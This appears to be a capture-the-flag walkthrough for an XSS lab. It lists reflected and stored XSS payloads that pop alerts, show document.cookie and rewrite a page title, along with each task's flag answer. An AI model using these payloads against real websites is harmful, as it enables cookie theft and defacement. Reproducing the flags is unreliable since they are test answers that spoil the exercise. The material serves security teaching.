Navigate to in your browser and click on the "Reflected XSS" tab on the navbar; craft a reflected XSS payload that will cause a popup saying "Hello".
On input search
<script>alert(“Hello”)</script>
Answer
ThereIsMoreToXSSThanYouThink
On the same reflective page, craft a reflected XSS payload that will cause a popup with your machines IP address.
<script>alert(window.location.hostname)</script>
Answer
ReflectiveXss4TheWin
Now navigate to in your browser and click on the "Stored XSS" tab on the navbar; make an account. Then add a comment and see if you can insert some of your own HTML.
<h1>this is an HTML tag </h1>
Answer
HTML_T4gs
On the same page, create an alert popup box appear on the page with your document cookies.
<script>alert(document.cookie)</script>
Answer
W3LL_D0N3_LVL2
Change "XSS Playground" to "I am a hacker" by adding a comment and using Javascript.
Find the ID of the XSS playground element
<script>document.querySelector('#thm-title').textContent = 'I am a hacker'</script>
